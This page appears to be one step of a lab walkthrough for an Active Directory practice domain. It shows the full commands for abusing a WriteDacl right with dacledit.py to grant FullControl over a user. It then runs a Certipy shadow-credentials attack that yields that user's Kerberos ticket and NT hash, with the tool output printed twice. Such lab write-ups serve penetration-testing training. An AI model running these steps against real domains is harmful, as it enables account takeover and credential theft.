WriteDacl on User (Ramon-> Nicolas)

To exploit writeDacl from Ramon to Nicolas we can use acledit.py
First we will clone the impacket’s fork created by shutdown (@_nwodtuhs) to get the last PR with dacledit

git clone https://github.com/ThePorgs/impacket.git
cd impacket 
sudo python3 setup.py install

Now we can use dacledit.py
First let’s look at Ramon’s right on Nicolas:

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

Ok now change the permission to “FullControl” and see the modification

dacledit.py -action 'write' -rights 'FullControl' -principal Ramon.Maldonado -target 'Nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

See Modification

dacledit.py -action 'read' -principal Ramon.Maldonado -target 'nicolas.Maduro' 'NewYork.local'/'Ramon.Maldonado':'monkey'

Ok now we can :
- change Nicolas password
- do a target kerberoasting
- do a shadow credentials
Let’s just use shadowcredentials :

certipy shadow auto -u Ramon.Maldonado@newyork.local -p 'monkey' -account 'Nicolas.Maduro'

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'nicolas.Maduro'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9943db05-a20e-bd91-5731-8e4ca58eacf6'
[*] Adding Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Successfully added Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro'
[*] Authenticating as 'nicolas.Maduro' with the certificate
[*] Using principal: nicolas.maduro@newyork.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'nicolas.maduro.ccache'
[*] Trying to retrieve NT hash for 'nicolas.maduro'
[*] Restoring the old Key Credentials for 'nicolas.Maduro'
[*] Successfully restored the old Key Credentials for 'nicolas.Maduro'
[*] NT hash for 'nicolas.Maduro': b3b3717f7d51b37fb325f7e7d048e998

PreviousGenericWrite on User (Hugo -> Ramon)NextAdd self on Group (Nicolas-> RadioCity)

Last updated 1 year ago

Certipy v4.3.0 - by Oliver Lyak (ly4k) [*] Targeting user 'nicolas.Maduro' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '9943db05-a20e-bd91-5731-8e4ca58eacf6' [*] Adding Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro' [*] Successfully added Key Credential with device ID '9943db05-a20e-bd91-5731-8e4ca58eacf6' to the Key Credentials for 'nicolas.Maduro' [*] Authenticating as 'nicolas.Maduro' with the certificate [*] Using principal: nicolas.maduro@newyork.local [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'nicolas.maduro.ccache' [*] Trying to retrieve NT hash for 'nicolas.maduro' [*] Restoring the old Key Credentials for 'nicolas.Maduro' [*] Successfully restored the old Key Credentials for 'nicolas.Maduro' [*] NT hash for 'nicolas.Maduro': b3b3717f7d51b37fb325f7e7d048e998